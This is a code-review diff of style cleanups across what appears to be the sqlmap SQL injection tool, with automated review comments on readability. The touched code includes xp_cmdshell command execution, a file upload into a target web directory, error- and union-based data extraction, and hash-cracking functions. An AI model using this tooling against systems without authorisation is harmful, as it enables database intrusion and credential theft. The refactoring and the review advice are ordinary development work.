"upload": "1", "upload": "1",
"file": stream, "file": stream,
"uploadDir": directory, "uploadDir": directory,
} }
if self.webApi == WEB_API.ASPX: if self.webApi == WEB_API.ASPX:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION


@ -214,7 +214,7 @@ class XP_cmdshell:
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
output = inject.getValue(query, resumeValue=False, blind=False, time=False) output = inject.getValue(query, resumeValue=False, blind=False, time=False)
if (output is None) or len(output)==0 or output[0] is None: if (output is None) or len(output) == 0 or output[0] is None:
output = [] output = []
count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
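Review bot: The rewritten test `if (output is None) or len(output) == 0 or output[0] is None:` reads more simply as `if not output or output[0] is None:`, assuming inject.getValue returns a list or None as the `output = []` fallback on the next line suggests; the parentheses around `output is None` add nothing. The enclosing method starts and ends outside the hunk.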


@ -611,7 +611,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# If we had no luck with commonValue and common charset, # If we had no luck with commonValue and common charset,
# use the returned other charset # use the returned other charset
if not val: if not val:
val = getChar(index, otherCharset, otherCharset==asciiTbl) val = getChar(index, otherCharset, otherCharset == asciiTbl)
else: else:
val = getChar(index, asciiTbl, not(charsetType is None and conf.charset)) val = getChar(index, asciiTbl, not(charsetType is None and conf.charset))


@ -133,20 +133,23 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
# Parse the returned page to get the exact error-based # Parse the returned page to get the exact error-based
# SQL injection output # SQL injection output
output = reduce(lambda x, y: x if x is not None else y, (\ output = reduce(lambda x, y: x if x is not None else y, (
extractRegexResult(check, page), \ extractRegexResult(check, page),
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \ extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), \ extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \ extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)),
None) None
)
if output is not None: if output is not None:
output = getUnicode(output) output = getUnicode(output)
else: else:
trimmed = extractRegexResult(trimcheck, page) \ trimmed = (
or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \ extractRegexResult(trimcheck, page) or
or extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) \ extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or
extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
)
if trimmed: if trimmed:
if not chunkTest: if not chunkTest:
@ -308,12 +311,7 @@ def errorUse(expression, dump=False):
# entry at a time # entry at a time
# NOTE: we assume that only queries that get data from a table can # NOTE: we assume that only queries that get data from a table can
# return multiple entries # return multiple entries
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \
or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond: if limitCond:
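Review bot: The condition beginning `if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper()` now runs to roughly 300 characters and evaluates `expression.upper()` four times and `Backend.getIdentifiedDbms()` three times, which is harder to read than the continuation-line form it replaces. Hoisting the invariants into locals keeps the line short and the repeated calls out of the expression: `upper = expression.upper()` and `dbms = Backend.getIdentifiedDbms()` just before the `if`, with the test then written against `upper` and `dbms`. The same joined-line pattern appears in unionUse at the line beginning `if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where`, and in the MaxDB and search enumeration hunks further down. errorUse's body continues outside the hunk.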


@ -233,13 +233,7 @@ def unionUse(expression, unpack=True, dump=False):
# SQL limiting the query output one entry at a time # SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table can # NOTE: we assume that only queries that get data from a table can
# return multiple entries # return multiple entries
if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
kb.forcePartialUnion or \
(dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \
" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \
and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond: if limitCond:


@ -94,7 +94,7 @@ class Database(object):
else: else:
self.cursor.execute(statement) self.cursor.execute(statement)
except sqlite3.OperationalError, ex: except sqlite3.OperationalError, ex:
if not "locked" in getSafeExString(ex): if "locked" not in getSafeExString(ex):
raise raise
else: else:
break break
@ -103,22 +103,11 @@ class Database(object):
return self.cursor.fetchall() return self.cursor.fetchall()
def init(self): def init(self):
self.execute("CREATE TABLE logs(" self.execute("CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)")
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, time TEXT, "
"level TEXT, message TEXT"
")")
self.execute("CREATE TABLE data(" self.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)")
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, status INTEGER, "
"content_type INTEGER, value TEXT"
")")
self.execute("CREATE TABLE errors(" self.execute("CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)")
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, error TEXT"
")")
class Task(object): class Task(object):
def __init__(self, taskid, remote_addr): def __init__(self, taskid, remote_addr):
@ -860,7 +849,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non
return return
elif command in ("help", "?"): elif command in ("help", "?"):
msg = "help Show this help message\n" msg = "help Show this help message\n"
msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n"
msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n"
msg += "data Retrieve and show data for current task\n" msg += "data Retrieve and show data for current task\n"


@ -167,7 +167,7 @@ def crawl(target):
if not conf.bulkFile: if not conf.bulkFile:
logger.info("searching for links with depth %d" % (i + 1)) logger.info("searching for links with depth %d" % (i + 1))
runThreads(numThreads, crawlThread, threadChoice=(i>0)) runThreads(numThreads, crawlThread, threadChoice=(i > 0))
clearConsoleLine(True) clearConsoleLine(True)
if threadData.shared.deeper: if threadData.shared.deeper:


@ -108,4 +108,3 @@ def checkDependencies():
if len(missing_libraries) == 0: if len(missing_libraries) == 0:
infoMsg = "all dependencies are installed" infoMsg = "all dependencies are installed"
logger.info(infoMsg) logger.info(infoMsg)


@ -25,7 +25,7 @@ class _Getch(object):
class _GetchUnix(object): class _GetchUnix(object):
def __init__(self): def __init__(self):
import tty __import__("tty")
def __call__(self): def __call__(self):
import sys import sys
@ -44,7 +44,7 @@ class _GetchUnix(object):
class _GetchWindows(object): class _GetchWindows(object):
def __init__(self): def __init__(self):
import msvcrt __import__("msvcrt")
def __call__(self): def __call__(self):
import msvcrt import msvcrt
@ -81,4 +81,3 @@ class _GetchMacCarbon(object):
getch = _Getch() getch = _Getch()
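Review bot: `__import__("tty")` in `_GetchUnix.__init__` and `__import__("msvcrt")` in `_GetchWindows.__init__` read as no-ops because the returned module is discarded; presumably the point is that an ImportError raised here lets the `_Getch` constructor fall back to another implementation, but that constructor is outside the hunk so the intent is invisible at the call site. A one-line comment would stop the next reader from deleting the call as dead code: `__import__("tty")  # probe only: ImportError here makes _Getch try another backend`. The same comment applies to the msvcrt line.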


@ -135,7 +135,6 @@ def postgres_passwd(password, username, uppercase=False):
'md599e5ea7a6f7c3269995cba3927fd0093' 'md599e5ea7a6f7c3269995cba3927fd0093'
""" """
if isinstance(username, unicode): if isinstance(username, unicode):
username = unicode.encode(username, UNICODE_ENCODING) username = unicode.encode(username, UNICODE_ENCODING)
@ -380,7 +379,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
ctx = password + magic + salt ctx = password + magic + salt
final = md5(password + salt + password).digest() final = md5(password + salt + password).digest()
for pl in xrange(len(password),0,-16): for pl in xrange(len(password), 0, -16):
if pl > 16: if pl > 16:
ctx = ctx + final[:16] ctx = ctx + final[:16]
else: else:
@ -389,7 +388,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
i = len(password) i = len(password)
while i: while i:
if i & 1: if i & 1:
ctx = ctx + chr(0) #if ($i & 1) { $ctx->add(pack("C", 0)); } ctx = ctx + chr(0) # if ($i & 1) { $ctx->add(pack("C", 0)); }
else: else:
ctx = ctx + password[0] ctx = ctx + password[0]
i = i >> 1 i = i >> 1
@ -417,7 +416,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
final = md5(ctx1).digest() final = md5(ctx1).digest()
hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))),4) hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))), 4)
hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4) hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4)
hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4) hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4)
hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4) hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4)
@ -522,38 +521,38 @@ def wordpress_passwd(password, salt, count, prefix, **kwargs):
return "%s%s" % (prefix, _encode64(hash_, 16)) return "%s%s" % (prefix, _encode64(hash_, 16))
__functions__ = { __functions__ = {
HASH.MYSQL: mysql_passwd, HASH.MYSQL: mysql_passwd,
HASH.MYSQL_OLD: mysql_old_passwd, HASH.MYSQL_OLD: mysql_old_passwd,
HASH.POSTGRES: postgres_passwd, HASH.POSTGRES: postgres_passwd,
HASH.MSSQL: mssql_passwd, HASH.MSSQL: mssql_passwd,
HASH.MSSQL_OLD: mssql_old_passwd, HASH.MSSQL_OLD: mssql_old_passwd,
HASH.MSSQL_NEW: mssql_new_passwd, HASH.MSSQL_NEW: mssql_new_passwd,
HASH.ORACLE: oracle_passwd, HASH.ORACLE: oracle_passwd,
HASH.ORACLE_OLD: oracle_old_passwd, HASH.ORACLE_OLD: oracle_old_passwd,
HASH.MD5_GENERIC: md5_generic_passwd, HASH.MD5_GENERIC: md5_generic_passwd,
HASH.SHA1_GENERIC: sha1_generic_passwd, HASH.SHA1_GENERIC: sha1_generic_passwd,
HASH.SHA224_GENERIC: sha224_generic_passwd, HASH.SHA224_GENERIC: sha224_generic_passwd,
HASH.SHA256_GENERIC: sha256_generic_passwd, HASH.SHA256_GENERIC: sha256_generic_passwd,
HASH.SHA384_GENERIC: sha384_generic_passwd, HASH.SHA384_GENERIC: sha384_generic_passwd,
HASH.SHA512_GENERIC: sha512_generic_passwd, HASH.SHA512_GENERIC: sha512_generic_passwd,
HASH.CRYPT_GENERIC: crypt_generic_passwd, HASH.CRYPT_GENERIC: crypt_generic_passwd,
HASH.JOOMLA: joomla_passwd, HASH.JOOMLA: joomla_passwd,
HASH.DJANGO_MD5: django_md5_passwd, HASH.DJANGO_MD5: django_md5_passwd,
HASH.DJANGO_SHA1: django_sha1_passwd, HASH.DJANGO_SHA1: django_sha1_passwd,
HASH.WORDPRESS: wordpress_passwd, HASH.WORDPRESS: wordpress_passwd,
HASH.APACHE_MD5_CRYPT: unix_md5_passwd, HASH.APACHE_MD5_CRYPT: unix_md5_passwd,
HASH.UNIX_MD5_CRYPT: unix_md5_passwd, HASH.UNIX_MD5_CRYPT: unix_md5_passwd,
HASH.APACHE_SHA1: apache_sha1_passwd, HASH.APACHE_SHA1: apache_sha1_passwd,
HASH.VBULLETIN: vbulletin_passwd, HASH.VBULLETIN: vbulletin_passwd,
HASH.VBULLETIN_OLD: vbulletin_passwd, HASH.VBULLETIN_OLD: vbulletin_passwd,
HASH.SSHA: ssha_passwd, HASH.SSHA: ssha_passwd,
HASH.SSHA256: ssha256_passwd, HASH.SSHA256: ssha256_passwd,
HASH.SSHA512: ssha512_passwd, HASH.SSHA512: ssha512_passwd,
HASH.MD5_BASE64: md5_generic_passwd, HASH.MD5_BASE64: md5_generic_passwd,
HASH.SHA1_BASE64: sha1_generic_passwd, HASH.SHA1_BASE64: sha1_generic_passwd,
HASH.SHA256_BASE64: sha256_generic_passwd, HASH.SHA256_BASE64: sha256_generic_passwd,
HASH.SHA512_BASE64: sha512_generic_passwd, HASH.SHA512_BASE64: sha512_generic_passwd,
} }
def storeHashesToFile(attack_dict): def storeHashesToFile(attack_dict):
if not attack_dict: if not attack_dict:


@ -8,256 +8,256 @@ See the file 'LICENSE' for copying permission
# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html # Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html
htmlEntities = { htmlEntities = {
'quot': 34, "quot": 34,
'amp': 38, "amp": 38,
'lt': 60, "lt": 60,
'gt': 62, "gt": 62,
'nbsp': 160, "nbsp": 160,
'iexcl': 161, "iexcl": 161,
'cent': 162, "cent": 162,
'pound': 163, "pound": 163,
'curren': 164, "curren": 164,
'yen': 165, "yen": 165,
'brvbar': 166, "brvbar": 166,
'sect': 167, "sect": 167,
'uml': 168, "uml": 168,
'copy': 169, "copy": 169,
'ordf': 170, "ordf": 170,
'laquo': 171, "laquo": 171,
'not': 172, "not": 172,
'shy': 173, "shy": 173,
'reg': 174, "reg": 174,
'macr': 175, "macr": 175,
'deg': 176, "deg": 176,
'plusmn': 177, "plusmn": 177,
'sup2': 178, "sup2": 178,
'sup3': 179, "sup3": 179,
'acute': 180, "acute": 180,
'micro': 181, "micro": 181,
'para': 182, "para": 182,
'middot': 183, "middot": 183,
'cedil': 184, "cedil": 184,
'sup1': 185, "sup1": 185,
'ordm': 186, "ordm": 186,
'raquo': 187, "raquo": 187,
'frac14': 188, "frac14": 188,
'frac12': 189, "frac12": 189,
'frac34': 190, "frac34": 190,
'iquest': 191, "iquest": 191,
'Agrave': 192, "Agrave": 192,
'Aacute': 193, "Aacute": 193,
'Acirc': 194, "Acirc": 194,
'Atilde': 195, "Atilde": 195,
'Auml': 196, "Auml": 196,
'Aring': 197, "Aring": 197,
'AElig': 198, "AElig": 198,
'Ccedil': 199, "Ccedil": 199,
'Egrave': 200, "Egrave": 200,
'Eacute': 201, "Eacute": 201,
'Ecirc': 202, "Ecirc": 202,
'Euml': 203, "Euml": 203,
'Igrave': 204, "Igrave": 204,
'Iacute': 205, "Iacute": 205,
'Icirc': 206, "Icirc": 206,
'Iuml': 207, "Iuml": 207,
'ETH': 208, "ETH": 208,
'Ntilde': 209, "Ntilde": 209,
'Ograve': 210, "Ograve": 210,
'Oacute': 211, "Oacute": 211,
'Ocirc': 212, "Ocirc": 212,
'Otilde': 213, "Otilde": 213,
'Ouml': 214, "Ouml": 214,
'times': 215, "times": 215,
'Oslash': 216, "Oslash": 216,
'Ugrave': 217, "Ugrave": 217,
'Uacute': 218, "Uacute": 218,
'Ucirc': 219, "Ucirc": 219,
'Uuml': 220, "Uuml": 220,
'Yacute': 221, "Yacute": 221,
'THORN': 222, "THORN": 222,
'szlig': 223, "szlig": 223,
'agrave': 224, "agrave": 224,
'aacute': 225, "aacute": 225,
'acirc': 226, "acirc": 226,
'atilde': 227, "atilde": 227,
'auml': 228, "auml": 228,
'aring': 229, "aring": 229,
'aelig': 230, "aelig": 230,
'ccedil': 231, "ccedil": 231,
'egrave': 232, "egrave": 232,
'eacute': 233, "eacute": 233,
'ecirc': 234, "ecirc": 234,
'euml': 235, "euml": 235,
'igrave': 236, "igrave": 236,
'iacute': 237, "iacute": 237,
'icirc': 238, "icirc": 238,
'iuml': 239, "iuml": 239,
'eth': 240, "eth": 240,
'ntilde': 241, "ntilde": 241,
'ograve': 242, "ograve": 242,
'oacute': 243, "oacute": 243,
'ocirc': 244, "ocirc": 244,
'otilde': 245, "otilde": 245,
'ouml': 246, "ouml": 246,
'divide': 247, "divide": 247,
'oslash': 248, "oslash": 248,
'ugrave': 249, "ugrave": 249,
'uacute': 250, "uacute": 250,
'ucirc': 251, "ucirc": 251,
'uuml': 252, "uuml": 252,
'yacute': 253, "yacute": 253,
'thorn': 254, "thorn": 254,
'yuml': 255, "yuml": 255,
'OElig': 338, "OElig": 338,
'oelig': 339, "oelig": 339,
'Scaron': 352, "Scaron": 352,
'fnof': 402, "fnof": 402,
'scaron': 353, "scaron": 353,
'Yuml': 376, "Yuml": 376,
'circ': 710, "circ": 710,
'tilde': 732, "tilde": 732,
'Alpha': 913, "Alpha": 913,
'Beta': 914, "Beta": 914,
'Gamma': 915, "Gamma": 915,
'Delta': 916, "Delta": 916,
'Epsilon': 917, "Epsilon": 917,
'Zeta': 918, "Zeta": 918,
'Eta': 919, "Eta": 919,
'Theta': 920, "Theta": 920,
'Iota': 921, "Iota": 921,
'Kappa': 922, "Kappa": 922,
'Lambda': 923, "Lambda": 923,
'Mu': 924, "Mu": 924,
'Nu': 925, "Nu": 925,
'Xi': 926, "Xi": 926,
'Omicron': 927, "Omicron": 927,
'Pi': 928, "Pi": 928,
'Rho': 929, "Rho": 929,
'Sigma': 931, "Sigma": 931,
'Tau': 932, "Tau": 932,
'Upsilon': 933, "Upsilon": 933,
'Phi': 934, "Phi": 934,
'Chi': 935, "Chi": 935,
'Psi': 936, "Psi": 936,
'Omega': 937, "Omega": 937,
'alpha': 945, "alpha": 945,
'beta': 946, "beta": 946,
'gamma': 947, "gamma": 947,
'delta': 948, "delta": 948,
'epsilon': 949, "epsilon": 949,
'zeta': 950, "zeta": 950,
'eta': 951, "eta": 951,
'theta': 952, "theta": 952,
'iota': 953, "iota": 953,
'kappa': 954, "kappa": 954,
'lambda': 955, "lambda": 955,
'mu': 956, "mu": 956,
'nu': 957, "nu": 957,
'xi': 958, "xi": 958,
'omicron': 959, "omicron": 959,
'pi': 960, "pi": 960,
'rho': 961, "rho": 961,
'sigmaf': 962, "sigmaf": 962,
'sigma': 963, "sigma": 963,
'tau': 964, "tau": 964,
'upsilon': 965, "upsilon": 965,
'phi': 966, "phi": 966,
'chi': 967, "chi": 967,
'psi': 968, "psi": 968,
'omega': 969, "omega": 969,
'thetasym': 977, "thetasym": 977,
'upsih': 978, "upsih": 978,
'piv': 982, "piv": 982,
'bull': 8226, "bull": 8226,
'hellip': 8230, "hellip": 8230,
'prime': 8242, "prime": 8242,
'Prime': 8243, "Prime": 8243,
'oline': 8254, "oline": 8254,
'frasl': 8260, "frasl": 8260,
'ensp': 8194, "ensp": 8194,
'emsp': 8195, "emsp": 8195,
'thinsp': 8201, "thinsp": 8201,
'zwnj': 8204, "zwnj": 8204,
'zwj': 8205, "zwj": 8205,
'lrm': 8206, "lrm": 8206,
'rlm': 8207, "rlm": 8207,
'ndash': 8211, "ndash": 8211,
'mdash': 8212, "mdash": 8212,
'lsquo': 8216, "lsquo": 8216,
'rsquo': 8217, "rsquo": 8217,
'sbquo': 8218, "sbquo": 8218,
'ldquo': 8220, "ldquo": 8220,
'rdquo': 8221, "rdquo": 8221,
'bdquo': 8222, "bdquo": 8222,
'dagger': 8224, "dagger": 8224,
'Dagger': 8225, "Dagger": 8225,
'permil': 8240, "permil": 8240,
'lsaquo': 8249, "lsaquo": 8249,
'rsaquo': 8250, "rsaquo": 8250,
'euro': 8364, "euro": 8364,
'weierp': 8472, "weierp": 8472,
'image': 8465, "image": 8465,
'real': 8476, "real": 8476,
'trade': 8482, "trade": 8482,
'alefsym': 8501, "alefsym": 8501,
'larr': 8592, "larr": 8592,
'uarr': 8593, "uarr": 8593,
'rarr': 8594, "rarr": 8594,
'darr': 8595, "darr": 8595,
'harr': 8596, "harr": 8596,
'crarr': 8629, "crarr": 8629,
'lArr': 8656, "lArr": 8656,
'uArr': 8657, "uArr": 8657,
'rArr': 8658, "rArr": 8658,
'dArr': 8659, "dArr": 8659,
'hArr': 8660, "hArr": 8660,
'forall': 8704, "forall": 8704,
'part': 8706, "part": 8706,
'exist': 8707, "exist": 8707,
'empty': 8709, "empty": 8709,
'nabla': 8711, "nabla": 8711,
'isin': 8712, "isin": 8712,
'notin': 8713, "notin": 8713,
'ni': 8715, "ni": 8715,
'prod': 8719, "prod": 8719,
'sum': 8721, "sum": 8721,
'minus': 8722, "minus": 8722,
'lowast': 8727, "lowast": 8727,
'radic': 8730, "radic": 8730,
'prop': 8733, "prop": 8733,
'infin': 8734, "infin": 8734,
'ang': 8736, "ang": 8736,
'and': 8743, "and": 8743,
'or': 8744, "or": 8744,
'cap': 8745, "cap": 8745,
'cup': 8746, "cup": 8746,
'int': 8747, "int": 8747,
'there4': 8756, "there4": 8756,
'sim': 8764, "sim": 8764,
'cong': 8773, "cong": 8773,
'asymp': 8776, "asymp": 8776,
'ne': 8800, "ne": 8800,
'equiv': 8801, "equiv": 8801,
'le': 8804, "le": 8804,
'ge': 8805, "ge": 8805,
'sub': 8834, "sub": 8834,
'sup': 8835, "sup": 8835,
'nsub': 8836, "nsub": 8836,
'sube': 8838, "sube": 8838,
'supe': 8839, "supe": 8839,
'oplus': 8853, "oplus": 8853,
'otimes': 8855, "otimes": 8855,
'perp': 8869, "perp": 8869,
'sdot': 8901, "sdot": 8901,
'lceil': 8968, "lceil": 8968,
'rceil': 8969, "rceil": 8969,
'lfloor': 8970, "lfloor": 8970,
'rfloor': 8971, "rfloor": 8971,
'lang': 9001, "lang": 9001,
'rang': 9002, "rang": 9002,
'loz': 9674, "loz": 9674,
'spades': 9824, "spades": 9824,
'clubs': 9827, "clubs": 9827,
'hearts': 9829, "hearts": 9829,
'diams': 9830, "diams": 9830,
} }


@ -62,8 +62,7 @@ class ProgressBar(object):
elif numHashes == allFull: elif numHashes == allFull:
self._progBar = "[%s]" % ("=" * allFull) self._progBar = "[%s]" % ("=" * allFull)
else: else:
self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes))
" " * (allFull - numHashes))
# Add the percentage at the beginning of the progress bar # Add the percentage at the beginning of the progress bar
percentString = getUnicode(percentDone) + "%" percentString = getUnicode(percentDone) + "%"


@ -20,4 +20,4 @@ except ImportError:
errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions))
errMsg += "most likely because current version of Python has been " errMsg += "most likely because current version of Python has been "
errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')"
exit(errMsg) exit(errMsg)


@ -69,7 +69,7 @@ class xrange(object):
if isinstance(index, slice): if isinstance(index, slice):
start, stop, step = index.indices(self._len()) start, stop, step = index.indices(self._len())
return xrange(self._index(start), return xrange(self._index(start),
self._index(stop), step*self.step) self._index(stop), step * self.step)
elif isinstance(index, (int, long)): elif isinstance(index, (int, long)):
if index < 0: if index < 0:
fixed_index = index + self._len() fixed_index = index + self._len()


@ -48,11 +48,12 @@ class Fingerprint(GenericFingerprint):
# Microsoft Access table reference updated on 01/2010 # Microsoft Access table reference updated on 01/2010
sysTables = { sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"), "97": ("MSysModules2", "MSysAccessObjects"),
"2000" : ("!MSysModules2", "MSysAccessObjects"), "2000": ("!MSysModules2", "MSysAccessObjects"),
"2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
"2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"), "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
} }
# MSysAccessXML is not a reliable system table because it doesn't always exist # MSysAccessXML is not a reliable system table because it doesn't always exist
# ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")


@ -37,7 +37,6 @@ class Connector(GenericConnector):
except ibm_db_dbi.OperationalError, msg: except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg) raise SqlmapConnectionException(msg)
self.initCursor() self.initCursor()
self.printConnected() self.printConnected()


@ -64,9 +64,9 @@ class Fingerprint(GenericFingerprint):
value += DBMS.DB2 value += DBMS.DB2
return value return value
actVer = Format.getDbms() actVer = Format.getDbms()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
@ -127,12 +127,14 @@ class Fingerprint(GenericFingerprint):
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
if result: if result:
versions = { "2003": ("5.2", (2, 1)), versions = {
"2003": ("5.2", (2, 1)),
"2008": ("7.0", (1,)), "2008": ("7.0", (1,)),
"2000": ("5.0", (4, 3, 2, 1)), "2000": ("5.0", (4, 3, 2, 1)),
"7": ("6.1", (1, 0)), "7": ("6.1", (1, 0)),
"XP": ("5.1", (2, 1)), "XP": ("5.1", (2, 1)),
"NT": ("4.0", (6, 5, 4, 3, 2, 1)) } "NT": ("4.0", (6, 5, 4, 3, 2, 1))
}
# Get back-end DBMS underlying operating system version # Get back-end DBMS underlying operating system version
for version, data in versions.items(): for version, data in versions.items():
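Review bot: `versions` is a plain dict that the loop at `for version, data in versions.items():` iterates, and on the Python 2 interpreter this code targets dict iteration order is arbitrary; if the loop body, which continues outside the hunk, stops at the first version whose probe succeeds, then which Windows version is reported is unspecified. If order matters, a tuple of pairs preserves the listed order, e.g. `versions = (("2003", ("5.2", (2, 1))), ("2008", ("7.0", (1,))), ...)` together with `for version, data in versions:`. If the loop deliberately tests every entry, a comment saying so on the dict would pre-empt the question.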


